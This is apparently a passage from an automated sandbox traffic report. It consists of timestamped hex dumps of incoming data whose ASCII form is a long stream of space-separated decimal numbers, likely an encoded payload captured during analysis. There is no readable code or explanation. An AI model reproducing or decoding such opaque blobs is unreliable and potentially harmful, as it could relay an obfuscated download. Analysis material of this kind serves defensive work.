                                                                                              Data Ascii: 79 242 66 109 112 54 78 5 54 84 118 93 13 113 50 54 178 0 84 114 113 117 121 188 135 37 111 71 117 102 105 72 216 48 50 54 70 119 139 120 96 50 48 48 36 81 123 100 105 234 75 120 50 54 85 3 61 109 112 51 77 45 54 84 118 103 104 121 35 52 37 110 206 11 71
                                                                                              2021-09-27 18:28:01 UTC3411INData Raw: 20 31 31 37 20 31 30 33 20 31 32 30 20 37 36 20 37 20 35 30 20 35 34 20 38 30 20 32 39 20 34 36 20 31 30 39 20 31 31 32 20 35 36 20 32 37 20 34 39 20 35 38 20 31 32 37 20 31 34 36 20 31 31 20 38 37 20 31 31 32 20 35 30 20 35 32 20 39 33 20 31 30 34 20 38 34 20 31 31 34 20 31 32 37 20 31 32 33 20 39 32 20 34 39 20 32 32 20 32 35 20 31 30 32 20 37 31 20 31 31 39 20 39 34 20 31 35 31 20 39 38 20 35 35 20 32 34 20 31 30 39 20 35 34 20 38 34 20 31 32 30 20 31 32 30 20 31 30 30 20 31 31 20 33 32 20 34 38 20 35 30 20 35 30 20 31 32 31 20 31 31 32 20 39 34 20 38 37 20 31 32 30 20 35 39 20 37 35 20 33 35 20 35 34 20 38 34 20 31 31 38 20 32 34 39 20 33 37 20 31 31 32 20 35 30 20 34 39 20 39 33 20 31 30 39 20 38 34 20 31 31 34 20 31 32 37 20 31 30 31 20 31 32 31 20
                                                                                              Data Ascii: 117 103 120 76 7 50 54 80 29 46 109 112 56 27 49 58 127 146 11 87 112 50 52 93 104 84 114 127 123 92 49 22 25 102 71 119 94 151 98 55 24 109 54 84 120 120 100 11 32 48 50 50 121 112 94 87 120 59 75 35 54 84 118 249 37 112 50 49 93 109 84 114 127 101 121
                                                                                              2021-09-27 18:28:01 UTC3412INData Raw: 31 31 37 20 31 30 39 20 31 31 36 20 35 38 20 33 39 20 37 39 20 33 36 20 38 34 20 31 31 34 20 31 31 33 20 31 30 31 20 39 38 20 35 30 20 37 35 20 31 36 20 35 34 20 38 34 20 31 31 38 20 38 20 31 32 36 20 31 31 32 20 35 30 20 35 32 20 35 38 20 33 36 20 38 34 20 39 20 38 34 20 31 30 39 20 31 31 32 20 35 34 20 37 37 20 33 38 20 35 34 20 38 34 20 31 31 38 20 31 30 33 20 31 30 39 20 31 31 20 31 36 20 34 38 20 35 30 20 35 30 20 39 32 20 39 30 20 39 31 20 31 30 38 20 31 31 32 20 35 32 20 32 37 20 35 32 20 36 31 20 31 32 37 20 32 30 38 20 31 32 37 20 37 30 20 32 31 38 20 33 32 20 35 31 20 32 36 20 31 33 33 20 38 34 20 31 31 34 20 31 32 37 20 36 34 20 32 35 31 20 32 33 36 20 36 32 20 33 32 20 35 33 20 31 37 30 20 31 30 30 20 39 39 20 31 30 39 20 31 31 32 20 34 31 20
                                                                                              Data Ascii: 117 109 116 58 39 79 36 84 114 113 101 98 50 75 16 54 84 118 8 126 112 50 52 58 36 84 9 84 109 112 54 77 38 54 84 118 103 109 11 16 48 50 50 92 90 91 108 112 52 27 52 61 127 208 127 70 218 32 51 26 133 84 114 127 64 251 236 62 32 53 170 100 99 109 112 41
                                                                                              2021-09-27 18:28:01 UTC3414INData Raw: 30 20 35 34 20 38 32 20 31 32 20 37 38 20 31 30 39 20 31 31 32 20 35 34 20 31 36 20 31 31 35 20 32 33 20 31 33 32 20 31 30 38 20 39 33 20 31 34 36 20 31 31 32 20 35 30 20 35 34 20 37 36 20 37 37 20 38 34 20 31 31 34 20 31 31 33 20 32 32 35 20 38 30 20 35 30 20 34 38 20 35 31 20 38 39 20 31 32 20 31 31 34 20 31 31 37 20 31 30 37 20 31 34 20 39 20 34 38 20 35 30 20 35 30 20 31 31 36 20 34 20 38 34 20 31 38 39 20 31 31 30 20 32 36 20 32 30 37 20 35 30 20 35 34 20 38 32 20 31 32 20 39 20 31 30 39 20 31 31 32 20 35 34 20 31 38 38 20 31 38 20 35 34 20 38 34 20 31 31 35 20 32 36 20 35 33 20 31 31 32 20 35 30 20 35 34 20 37 36 20 31 33 20 38 34 20 31 31 34 20 31 31 33 20 37 37 20 32 39 20 31 39 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20
                                                                                              Data Ascii: 0 54 82 12 78 109 112 54 16 115 23 132 108 93 146 112 50 54 76 77 84 114 113 225 80 50 48 51 89 12 114 117 107 14 9 48 50 50 116 4 84 189 110 26 207 50 54 82 12 9 109 112 54 188 18 54 84 115 26 53 112 50 54 76 13 84 114 113 77 29 19 224 44 30 171 114 117
                                                                                              2021-09-27 18:28:01 UTC3415INData Raw: 34 20 31 31 34 20 31 31 35 20 36 39 20 31 39 36 20 35 30 20 34 38 20 35 32 20 33 30 20 35 33 20 31 31 34 20 31 31 37 20 31 30 33 20 31 37 34 20 35 30 20 32 36 20 35 31 20 33 38 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 39 38 20 35 30 20 39 39 20 38 37 20 35 34 20 37 34 20 35 32 20 31 31 37 20 31 30 39 20 31 31 33 20 33 33 20 30 20 35 32 20 35 34 20 38 35 20 31 31 35 20 31 31 37 20 31 30 39 20 39 34 20 35 30 20 34 38 20 33 35 20 33 30 20 35 38 20 31 31 34 20 31 31 37 20 31 30 37 20 31 30 32 20 33 30 20 35 37 20 32 30 20 34 39 20 31 30 39 20 31 33 30 20 31 31 37 20 31 30 39 20 31 31 32 20 32 35 20 35 31 20 35 37 20 32 39 20 31 36 31 20 31 31 37 20 36 20 31 37 30 20 31 31 32 20 35 30 20 35 38 20 34 33 20 31 32 20 31 33 33 20 31 31 34 20 31 31 37 20 31
                                                                                              Data Ascii: 4 114 115 69 196 50 48 52 30 53 114 117 103 174 50 26 51 38 84 114 117 109 98 50 99 87 54 74 52 117 109 113 33 0 52 54 85 115 117 109 94 50 48 35 30 58 114 117 107 102 30 57 20 49 109 130 117 109 112 25 51 57 29 161 117 6 170 112 50 58 43 12 133 114 117 1
                                                                                              2021-09-27 18:28:01 UTC3416INData Raw: 31 32 34 20 33 32 20 31 31 37 20 31 30 39 20 31 32 32 20 39 33 20 31 39 31 20 35 30 20 35 34 20 39 34 20 31 31 36 20 31 30 39 20 35 33 20 31 32 32 20 35 32 20 35 37 20 33 20 31 35 37 20 31 32 36 20 39 37 20 36 39 20 31 30 34 20 31 31 32 20 32 33 35 20 34 38 20 35 30 20 35 34 20 31 30 30 20 31 31 34 20 31 31 37 20 31 32 34 20 31 31 34 20 31 38 38 20 31 33 35 20 33 36 20 35 20 38 35 20 38 38 20 31 31 39 20 31 32 33 20 32 33 34 20 37 35 20 32 20 35 30 20 35 34 20 38 35 20 33 20 37 31 20 31 30 39 20 31 31 32 20 35 31 20 33 38 20 33 30 20 33 30 20 31 31 34 20 31 31 32 20 39 38 20 32 34 37 20 34 20 35 36 20 34 38 20 35 30 20 34 35 20 37 34 20 39 35 20 38 36 20 37 35 20 31 34 20 35 20 34 38 20 35 30 20 35 30 20 31 32 34 20 31 38 20 31 31 36 20 31 30 39 20 31 31
                                                                                              Data Ascii: 124 32 117 109 122 93 191 50 54 94 116 109 53 122 52 57 3 157 126 97 69 104 112 235 48 50 54 100 114 117 124 114 188 135 36 5 85 88 119 123 234 75 2 50 54 85 3 71 109 112 51 38 30 30 114 112 98 247 4 56 48 50 45 74 95 86 75 14 5 48 50 50 124 18 116 109 11
                                                                                              2021-09-27 18:28:01 UTC3418INData Raw: 32 31 38 20 31 39 37 20 39 33 20 31 36 32 20 31 31 32 20 35 30 20 35 38 20 35 32 20 32 38 20 38 34 20 31 31 36 20 39 35 20 31 30 39 20 31 31 32 20 33 33 20 30 20 35 32 20 35 34 20 39 38 20 31 31 34 20 31 31 37 20 31 30 39 20 36 36 20 35 30 20 34 38 20 33 35 20 33 36 20 38 35 20 31 31 32 20 31 31 30 20 31 32 32 20 39 33 20 32 37 20 32 32 20 32 32 36 20 31 38 37 20 38 34 20 31 31 34 20 31 31 36 20 36 39 20 35 34 20 35 30 20 34 38 20 35 36 20 33 32 20 35 39 20 31 36 32 20 31 31 37 20 31 30 39 20 31 32 32 20 33 36 20 31 37 30 20 37 30 20 31 38 37 20 38 34 20 31 31 34 20 31 31 36 20 32 20 31 36 31 20 35 30 20 34 38 20 35 36 20 33 30 20 31 33 34 20 31 31 34 20 31 31 37 20 31 30 33 20 31 31 39 20 34 33 20 34 35 20 33 31 20 35 31 20 31 31 34 20 38 38 20 38 33 20
                                                                                              Data Ascii: 218 197 93 162 112 50 58 52 28 84 116 95 109 112 33 0 52 54 98 114 117 109 66 50 48 35 36 85 112 110 122 93 27 22 226 187 84 114 116 69 54 50 48 56 32 59 162 117 109 122 36 170 70 187 84 114 116 2 161 50 48 56 30 134 114 117 103 119 43 45 31 51 114 88 83
                                                                                              2021-09-27 18:28:01 UTC3419INData Raw: 38 20 39 34 20 31 35 33 20 39 30 20 31 38 20 32 30 32 20 35 30 20 35 34 20 38 34 20 39 30 20 31 37 31 20 31 30 39 20 31 31 32 20 35 36 20 35 35 20 31 38 20 32 30 34 20 38 34 20 31 31 34 20 31 31 37 20 35 33 20 31 32 33 20 35 33 20 35 36 20 33 20 31 34 32 20 31 32 34 20 32 35 30 20 31 31 37 20 31 30 39 20 31 31 38 20 32 34 20 31 32 36 20 32 36 20 31 31 39 20 38 35 20 31 31 34 20 31 31 35 20 31 32 33 20 39 34 20 35 36 20 32 34 20 31 31 35 20 35 35 20 38 34 20 31 31 36 20 39 33 20 31 37 39 20 31 31 32 20 35 30 20 35 38 20 32 34 20 31 32 30 20 31 32 34 20 37 33 20 31 31 36 20 31 30 39 20 31 31 38 20 33 31 20 34 39 20 32 34 20 33 30 20 31 33 39 20 31 31 34 20 31 31 37 20 31 30 33 20 38 38 20 31 38 32 20 34 38 20 35 30 20 34 38 20 31 32 36 20 31 30 35 20 36 39
                                                                                              Data Ascii: 8 94 153 90 18 202 50 54 84 90 171 109 112 56 55 18 204 84 114 117 53 123 53 56 3 142 124 250 117 109 118 24 126 26 119 85 114 115 123 94 56 24 115 55 84 116 93 179 112 50 58 24 120 124 73 116 109 118 31 49 24 30 139 114 117 103 88 182 48 50 48 126 105 69
                                                                                              2021-09-27 18:28:01 UTC3420INData Raw: 39 20 31 31 38 20 31 30 32 20 39 31 20 32 32 33 20 35 35 20 31 38 20 32 32 39 20 31 31 39 20 31 36 32 20 31 30 37 20 36 39 20 31 34 33 20 35 30 20 34 38 20 35 32 20 33 30 20 31 33 39 20 31 31 34 20 31 31 37 20 31 30 33 20 33 31 20 32 31 38 20 34 38 20 35 30 20 36 30 20 37 33 20 39 35 20 39 36 20 37 35 20 31 34 20 37 37 20 34 38 20 35 30 20 35 30 20 39 32 20 38 32 20 31 30 31 20 37 34 20 31 31 32 20 35 30 20 32 34 20 31 39 31 20 35 34 20 38 34 20 31 31 36 20 38 39 20 39 38 20 39 31 20 34 39 20 36 30 20 32 35 20 32 32 33 20 31 32 34 20 31 37 33 20 31 31 37 20 31 30 39 20 31 32 32 20 32 36 20 31 37 39 20 35 30 20 35 34 20 38 32 20 39 30 20 36 36 20 31 30 38 20 31 31 32 20 35 32 20 39 20 31 38 32 20 35 34 20 38 34 20 31 31 34 20 31 31 34 20 37 37 20 31 36 33
                                                                                              Data Ascii: 9 118 102 91 223 55 18 229 119 162 107 69 143 50 48 52 30 139 114 117 103 31 218 48 50 60 73 95 96 75 14 77 48 50 50 92 82 101 74 112 50 24 191 54 84 116 89 98 91 49 60 25 223 124 173 117 109 122 26 179 50 54 82 90 66 108 112 52 9 182 54 84 114 114 77 163
                                                                                              2021-09-27 18:28:01 UTC3422INData Raw: 20 35 31 20 38 39 20 31 38 36 20 31 31 34 20 31 31 37 20 31 30 33 20 38 38 20 32 32 31 20 34 38 20 35 30 20 36 30 20 36 37 20 31 34 30 20 31 31 36 20 37 31 20 31 31 32 20 35 30 20 33 35 20 32 20 35 33 20 38 34 20 38 34 20 31 31 37 20 31 30 39 20 31 31 32 20 31 31 20 34 38 20 35 30 20 33 39 20 31 32 34 20 31 35 20 31 31 37 20 31 30 39 20 31 31 38 20 33 31 20 35 30 20 33 37 20 32 38 20 31 32 34 20 31 33 30 20 31 31 37 20 31 30 39 20 31 32 32 20 36 35 20 31 39 33 20 35 30 20 35 34 20 39 34 20 31 30 37 20 38 38 20 39 36 20 38 36 20 35 33 20 31 36 20 31 38 20 35 32 20 38 34 20 31 31 34 20 32 36 20 31 35 39 20 31 31 32 20 35 30 20 35 38 20 32 34 20 36 31 20 31 32 37 20 31 33 31 20 31 31 37 20 31 30 39 20 39 39 20 32 20 35 31 20 35 30 20 31 32 20 38 34 20 31 31
                                                                                              Data Ascii: 51 89 186 114 117 103 88 221 48 50 60 67 140 116 71 112 50 35 2 53 84 84 117 109 112 11 48 50 39 124 15 117 109 118 31 50 37 28 124 130 117 109 122 65 193 50 54 94 107 88 96 86 53 16 18 52 84 114 26 159 112 50 58 24 61 127 131 117 109 99 2 51 50 12 84 11
                                                                                              2021-09-27 18:28:01 UTC3423INData Raw: 32 20 32 33 20 34 38 20 31 30 20 31 30 37 20 38 34 20 38 32 20 35 31 20 31 30 39 20 31 31 32 20 35 31 20 34 33 20 32 20 35 33 20 38 34 20 33 30 20 31 31 37 20 31 30 39 20 31 31 32 20 31 35 20 34 38 20 35 30 20 33 39 20 34 32 20 31 35 20 31 31 37 20 31 30 39 20 31 31 36 20 31 38 20 32 32 34 20 32 32 20 32 33 30 20 37 34 20 39 30 20 31 33 38 20 31 30 39 20 31 31 32 20 35 32 20 32 34 20 31 35 34 20 35 34 20 38 34 20 31 32 30 20 31 30 34 20 36 34 20 31 32 33 20 32 30 20 35 35 20 32 36 20 31 35 32 20 38 34 20 31 31 34 20 31 32 37 20 36 34 20 31 31 39 20 32 35 20 35 31 20 35 37 20 32 39 20 31 36 37 20 31 30 32 20 39 35 20 31 30 36 20 38 38 20 32 30 31 20 34 38 20 35 30 20 36 30 20 37 37 20 39 35 20 31 32 36 20 37 35 20 31 32 30 20 32 36 20 31 35 38 20 35 30 20
                                                                                              Data Ascii: 2 23 48 10 107 84 82 51 109 112 51 43 2 53 84 30 117 109 112 15 48 50 39 42 15 117 109 116 18 224 22 230 74 90 138 109 112 52 24 154 54 84 120 104 64 123 20 55 26 152 84 114 127 64 119 25 51 57 29 167 102 95 106 88 201 48 50 60 77 95 126 75 120 26 158 50
                                                                                              2021-09-27 18:28:01 UTC3424INData Raw: 20 36 37 20 32 30 37 20 35 34 20 38 34 20 31 32 30 20 31 30 35 20 36 34 20 31 30 30 20 32 30 20 32 34 20 31 32 37 20 35 35 20 38 34 20 31 31 36 20 31 30 33 20 31 31 31 20 38 38 20 32 30 34 20 34 38 20 35 30 20 36 30 20 31 32 30 20 31 32 35 20 39 34 20 31 30 37 20 31 32 34 20 32 35 20 32 31 32 20 36 33 20 32 39 20 31 39 30 20 31 32 33 20 31 32 35 20 32 20 31 34 33 20 35 30 20 34 38 20 35 36 20 33 30 20 32 36 20 31 31 35 20 31 31 37 20 31 30 37 20 39 38 20 34 38 20 32 34 20 32 30 34 20 35 34 20 38 34 20 31 32 30 20 38 39 20 31 30 36 20 31 32 31 20 35 38 20 39 35 20 32 30 35 20 35 34 20 38 34 20 31 32 30 20 31 31 35 20 31 30 30 20 33 31 20 35 30 20 34 39 20 35 30 20 36 30 20 35 39 20 32 33 31 20 31 31 36 20 31 30 39 20 31 31 38 20 35 32 20 32 36 20 35 30 20
                                                                                              Data Ascii: 67 207 54 84 120 105 64 100 20 24 127 55 84 116 103 111 88 204 48 50 60 120 125 94 107 124 25 212 63 29 190 123 125 2 143 50 48 56 30 26 115 117 107 98 48 24 204 54 84 120 89 106 121 58 95 205 54 84 120 115 100 31 50 49 50 60 59 231 116 109 118 52 26 50
                                                                                              2021-09-27 18:28:01 UTC3426INData Raw: 20 31 31 32 20 35 34 20 32 34 20 35 35 20 35 35 20 38 34 20 31 32 30 20 39 38 20 37 20 36 37 20 33 38 20 32 34 20 31 30 30 20 35 35 20 38 34 20 31 31 36 20 31 30 37 20 36 34 20 31 32 31 20 32 30 20 33 38 20 32 36 20 31 37 36 20 38 34 20 31 31 34 20 31 31 35 20 37 30 20 31 31 35 20 32 30 20 32 37 20 31 39 39 20 32 38 20 38 34 20 31 38 30 20 31 31 20 33 37 20 31 31 32 20 35 30 20 35 32 20 33 36 20 39 32 20 31 30 33 20 31 31 35 20 39 35 20 31 38 20 35 36 20 35 30 20 34 38 20 35 34 20 33 30 20 38 32 20 31 31 35 20 31 31 37 20 31 30 33 20 31 30 32 20 38 38 20 33 20 34 32 20 33 30 20 31 30 34 20 31 31 35 20 31 31 37 20 31 30 37 20 39 32 20 35 35 20 32 34 20 37 34 20 35 34 20 38 34 20 31 31 36 20 39 33 20 38 30 20 31 31 33 20 35 30 20 35 34 20 33 30 20 35 31 20
                                                                                              Data Ascii: 112 54 24 55 55 84 120 98 7 67 38 24 100 55 84 116 107 64 121 20 38 26 176 84 114 115 70 115 20 27 199 28 84 180 11 37 112 50 52 36 92 103 115 95 18 56 50 48 54 30 82 115 117 103 102 88 3 42 30 104 115 117 107 92 55 24 74 54 84 116 93 80 113 50 54 30 51
                                                                                              2021-09-27 18:28:01 UTC3427INData Raw: 31 30 39 20 33 39 20 31 30 31 20 34 38 20 31 38 20 31 31 32 20 38 34 20 31 31 34 20 31 31 36 20 31 31 38 20 36 34 20 34 39 20 34 38 20 37 33 20 35 34 20 38 34 20 31 31 34 20 35 35 20 31 30 39 20 31 31 32 20 33 35 20 31 36 20 31 38 39 20 31 39 20 31 33 32 20 31 30 38 20 39 33 20 31 34 36 20 31 31 32 20 35 30 20 35 34 20 34 38 20 33 30 20 38 20 31 31 34 20 31 31 37 20 31 30 33 20 31 30 32 20 33 30 20 32 37 20 32 30 20 32 32 20 31 32 38 20 38 37 20 31 36 35 20 31 31 35 20 38 38 20 32 30 35 20 34 38 20 35 30 20 34 38 20 38 33 20 39 30 20 32 32 39 20 31 30 39 20 31 31 32 20 35 32 20 34 36 20 33 31 20 34 34 20 31 31 34 20 31 32 32 20 39 33 20 31 33 37 20 31 31 32 20 35 30 20 35 38 20 34 36 20 32 37 20 37 31 20 38 34 20 31 30 30 20 31 30 35 20 31 31 35 20 39 33
                                                                                              Data Ascii: 109 39 101 48 18 112 84 114 116 118 64 49 48 73 54 84 114 55 109 112 35 16 189 19 132 108 93 146 112 50 54 48 30 8 114 117 103 102 30 27 20 22 128 87 165 115 88 205 48 50 48 83 90 229 109 112 52 46 31 44 114 122 93 137 112 50 58 46 27 71 84 100 105 115 93
                                                                                              2021-09-27 18:28:01 UTC3428INData Raw: 31 37 20 31 30 37 20 39 32 20 35 35 20 32 33 37 20 31 37 36 20 35 34 20 38 34 20 31 31 34 20 31 31 20 39 32 20 31 31 32 20 35 30 20 35 32 20 32 36 20 33 38 20 38 35 20 31 31 34 20 31 32 37 20 36 39 20 31 33 33 20 35 30 20 34 38 20 35 36 20 31 36 20 34 32 20 36 37 20 31 31 37 20 31 30 39 20 31 31 36 20 32 36 20 31 36 31 20 35 30 20 35 34 20 38 32 20 39 35 20 31 30 38 20 31 39 20 36 35 20 35 30 20 34 38 20 35 34 20 33 30 20 39 34 20 31 31 35 20 31 31 37 20 31 30 33 20 38 38 20 32 33 37 20 34 38 20 35 30 20 36 30 20 34 32 20 36 37 20 31 31 37 20 31 30 39 20 31 31 36 20 32 36 20 33 33 20 35 31 20 35 34 20 39 34 20 31 32 20 31 30 33 20 31 30 38 20 31 31 32 20 35 36 20 37 38 20 32 39 20 35 34 20 38 34 20 31 31 38 20 39 38 20 32 20 31 35 37 20 35 30 20 34 38 20
                                                                                              Data Ascii: 17 107 92 55 237 176 54 84 114 11 92 112 50 52 26 38 85 114 127 69 133 50 48 56 16 42 67 117 109 116 26 161 50 54 82 95 108 19 65 50 48 54 30 94 115 117 103 88 237 48 50 60 42 67 117 109 116 26 33 51 54 94 12 103 108 112 56 78 29 54 84 118 98 2 157 50 48
                                                                                              2021-09-27 18:28:01 UTC3430INData Raw: 31 32 32 20 37 36 20 30 20 35 30 20 35 34 20 38 30 20 39 30 20 31 30 30 20 31 30 38 20 31 31 32 20 35 36 20 37 38 20 32 32 32 20 35 34 20 38 34 20 31 32 30 20 31 31 20 36 36 20 31 31 32 20 35 30 20 35 32 20 33 37 20 38 39 20 31 38 35 20 31 31 34 20 31 31 37 20 31 30 33 20 31 30 37 20 33 31 20 34 30 20 32 30 20 34 38 20 34 32 20 31 33 20 31 31 37 20 31 30 39 20 31 31 36 20 37 36 20 30 20 35 30 20 35 34 20 38 30 20 32 39 20 31 30 32 20 31 30 38 20 31 31 32 20 35 36 20 32 34 20 31 36 31 20 35 34 20 38 34 20 31 31 36 20 31 37 31 20 37 34 20 31 32 32 20 32 35 20 32 31 34 20 32 33 20 33 30 20 32 34 20 31 31 34 20 31 31 37 20 31 30 33 20 31 30 37 20 33 31 20 34 30 20 32 30 20 34 39 20 31 31 36 20 31 32 33 20 38 30 20 31 38 39 20 31 31 30 20 32 36 20 32 30 37 20
                                                                                              Data Ascii: 122 76 0 50 54 80 90 100 108 112 56 78 222 54 84 120 11 66 112 50 52 37 89 185 114 117 103 107 31 40 20 48 42 13 117 109 116 76 0 50 54 80 29 102 108 112 56 24 161 54 84 116 171 74 122 25 214 23 30 24 114 117 103 107 31 40 20 49 116 123 80 189 110 26 207
                                                                                              2021-09-27 18:28:01 UTC3431INData Raw: 33 20 31 34 36 20 31 31 32 20 35 30 20 35 34 20 32 36 20 31 33 30 20 38 34 20 31 31 34 20 31 31 35 20 36 39 20 31 37 20 35 30 20 34 38 20 35 36 20 32 33 32 20 38 34 20 31 30 30 20 39 35 20 31 30 37 20 39 30 20 37 36 20 30 20 35 31 20 33 38 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 31 32 30 20 31 32 32 20 35 34 20 37 34 20 35 32 20 31 31 37 20 31 30 39 20 31 31 33 20 34 39 20 30 20 35 36 20 35 34 20 37 37 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 33 20 37 39 20 31 31 31 20 38 38 20 31 32 34 20 38 36 20 39 33 20 33 38 20 35 31 20 35 34 20 39 34 20 36 20 35 31 20 31 30 39 20 31 31 32 20 35 31 20 32 34 20 31 37 31 20 35 34 20 38 34 20 31 31 36 20 39 35 20 37 35 20 39 31 20 32 32 33 20 34 38 20
                                                                                              Data Ascii: 3 146 112 50 54 26 130 84 114 115 69 17 50 48 56 232 84 100 95 107 90 76 0 51 38 84 114 117 109 112 50 120 122 54 74 52 117 109 113 49 0 56 54 77 114 117 109 112 50 48 50 53 79 111 88 124 86 93 38 51 54 94 6 51 109 112 51 24 171 54 84 116 95 75 91 223 48
                                                                                              2021-09-27 18:28:01 UTC3432INData Raw: 37 20 31 30 39 20 31 31 32 20 35 36 20 32 34 20 38 33 20 35 34 20 38 34 20 31 32 30 20 31 37 31 20 31 30 39 20 39 30 20 34 39 20 36 30 20 35 31 20 33 38 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 31 38 35 20 31 38 37 20 35 34 20 38 38 20 35 32 20 31 31 37 20 31 30 39 20 31 31 33 20 33 33 20 30 20 35 34 20 35 34 20 32 34 20 31 31 34 20 31 31 37 20 31 30 39 20 35 37 20 35 30 20 34 38 20 33 35 20 37 32 20 34 32 20 31 31 34 20 31 31 37 20 31 30 35 20 31 31 34 20 31 38 20 31 36 31 20 32 30 20 32 33 30 20 37 34 20 39 30 20 31 33 38 20 31 30 39 20 31 31 32 20 35 32 20 32 34 20 32 31 39 20 35 34 20 38 34 20 31 32 30 20 39 33 20 31 39 37 20 31 31 32 20 35 30 20 35 38 20 34 30 20 32 37 20 39 35 20 38 34 20 31 31 35 20 36 39 20 32 32 32 20
                                                                                              Data Ascii: 7 109 112 56 24 83 54 84 120 171 109 90 49 60 51 38 84 114 117 109 112 50 185 187 54 88 52 117 109 113 33 0 54 54 24 114 117 109 57 50 48 35 72 42 114 117 105 114 18 161 20 230 74 90 138 109 112 52 24 219 54 84 120 93 197 112 50 58 40 27 95 84 115 69 222
                                                                                              2021-09-27 18:28:01 UTC3434INData Raw: 20 35 34 20 38 34 20 31 32 30 20 31 36 39 20 37 31 20 31 31 32 20 35 30 20 34 39 20 35 31 20 33 38 20 38 34 20 31 31 34 20 31 31 39 20 31 30 39 20 31 30 30 20 35 30 20 31 38 39 20 31 34 37 20 35 34 20 38 33 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 34 31 20 30 20 35 34 20 35 34 20 32 34 37 20 31 31 34 20 31 31 37 20 31 30 39 20 35 39 20 35 30 20 34 38 20 33 35 20 37 32 20 33 30 20 31 31 34 20 31 31 37 20 31 30 35 20 31 30 35 20 33 31 20 35 37 20 32 30 20 36 32 20 31 32 34 20 32 35 31 20 31 31 37 20 31 30 39 20 31 32 32 20 32 35 20 35 31 20 36 32 20 32 39 20 31 36 31 20 31 31 32 20 39 33 20 32 34 20 31 31 32 20 35 30 20 35 38 20 33 30 20 35 31 20 31 33 37 20 32 34 33 20 31 31 37 20 31 30 39 20 31 31 32 20 34 38 20 31 36 20 31 31 33 20 31 36 20 31
                                                                                              Data Ascii: 54 84 120 169 71 112 50 49 51 38 84 114 119 109 100 50 189 147 54 83 114 117 109 112 41 0 54 54 247 114 117 109 59 50 48 35 72 30 114 117 105 105 31 57 20 62 124 251 117 109 122 25 51 62 29 161 112 93 24 112 50 58 30 51 137 243 117 109 112 48 16 113 16 1
                                                                                              2021-09-27 18:28:01 UTC3435INData Raw: 34 38 20 31 32 34 20 31 39 33 20 31 31 37 20 31 30 39 20 31 31 38 20 32 36 20 38 31 20 35 30 20 35 34 20 39 34 20 31 37 32 20 31 31 38 20 31 30 32 20 39 31 20 32 31 30 20 33 34 20 34 38 20 33 30 20 35 34 20 31 31 34 20 31 31 37 20 31 30 33 20 39 33 20 31 35 31 20 32 33 38 20 36 30 20 33 36 20 38 36 20 31 34 30 20 39 39 20 39 39 20 31 31 32 20 35 30 20 34 33 20 39 33 20 38 35 20 38 34 20 31 31 34 20 31 32 37 20 31 37 37 20 39 30 20 35 30 20 34 39 20 34 36 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 38 38 20 31 31 32 20 36 30 20 31 31 35 20 35 30 20 32 38 20 31 38 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 34 20 35 30 20 35 36 20 35 30 20 37 30 20 34 34 20 31 31 34 20 31 32 33 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 34 31 20 36 20 38 30 20 31 31 34
                                                                                              Data Ascii: 48 124 193 117 109 118 26 81 50 54 94 172 118 102 91 210 34 48 30 54 114 117 103 93 151 238 60 36 86 140 99 99 112 50 43 93 85 84 114 127 177 90 50 49 46 54 84 114 117 88 112 60 115 50 28 18 114 117 108 114 50 56 50 70 44 114 123 109 112 50 48 41 6 80 114
                                                                                              2021-09-27 18:28:01 UTC3439INData Raw: 20 31 31 36 20 31 30 39 20 31 32 32 20 33 38 20 32 30 36 20 35 32 20 32 34 34 20 38 34 20 31 31 34 20 31 31 35 20 33 30 20 31 35 34 20 35 30 20 34 38 20 35 36 20 33 30 20 31 39 31 20 31 31 34 20 31 31 37 20 31 30 33 20 38 36 20 32 34 20 31 37 38 20 35 30 20 35 35 20 36 38 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 32 20 31 34 20 34 38 20 32 36 20 38 32 20 38 34 20 31 31 37 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 33 20 32 20 35 30 20 38 34 20 32 35 31 20 31 31 37 20 31 30 39 20 31 31 32 20 31 32 37 20 34 38 20 35 30 20 33 39 20 34 32 20 37 32 20 31 31 37 20 31 30 39 20 31 31 36 20 31 31 20 37 38 20 35 30 20 35 34 20 38 34 20 31 32 20 37 39 20 31 30 39 20 31 31 32 20 35 34 20 39 35 20 31 30 38 20 35 34 20 38 34 20 31 32 30 20 39 36 20 36 34 20
                                                                                              Data Ascii: 116 109 122 38 206 52 244 84 114 115 30 154 50 48 56 30 191 114 117 103 86 24 178 50 55 68 114 117 111 112 14 48 26 82 84 117 117 109 112 50 43 2 50 84 251 117 109 112 127 48 50 39 42 72 117 109 116 11 78 50 54 84 12 79 109 112 54 95 108 54 84 120 96 64
                                                                                              2021-09-27 18:28:01 UTC3443INData Raw: 20 31 31 33 20 35 30 20 35 38 20 32 36 20 31 35 35 20 38 34 20 31 31 34 20 31 32 37 20 36 39 20 31 39 37 20 35 30 20 34 38 20 35 32 20 37 32 20 34 33 20 31 31 34 20 31 31 37 20 31 30 33 20 38 38 20 31 33 35 20 34 38 20 35 30 20 34 38 20 31 32 36 20 38 34 20 39 34 20 32 31 31 20 38 36 20 32 35 20 32 32 39 20 32 30 20 32 39 20 31 33 37 20 31 31 34 20 31 31 37 20 31 32 36 20 36 34 20 34 39 20 34 38 20 31 39 37 20 35 34 20 38 34 20 31 31 34 20 33 32 20 31 30 39 20 31 31 32 20 33 35 20 37 38 20 31 31 35 20 35 34 20 38 34 20 31 31 38 20 38 38 20 31 30 33 20 31 34 20 31 31 34 20 34 38 20 35 30 20 35 30 20 31 30 39 20 31 35 31 20 31 31 37 20 31 30 39 20 31 31 32 20 34 38 20 39 35 20 32 20 35 35 20 38 34 20 31 32 30 20 31 31 30 20 36 34 20 38 32 20 32 30 20 37 39
                                                                                              Data Ascii: 113 50 58 26 155 84 114 127 69 197 50 48 52 72 43 114 117 103 88 135 48 50 48 126 84 94 211 86 25 229 20 29 137 114 117 126 64 49 48 197 54 84 114 32 109 112 35 78 115 54 84 118 88 103 14 114 48 50 50 109 151 117 109 112 48 95 2 55 84 120 110 64 82 20 79
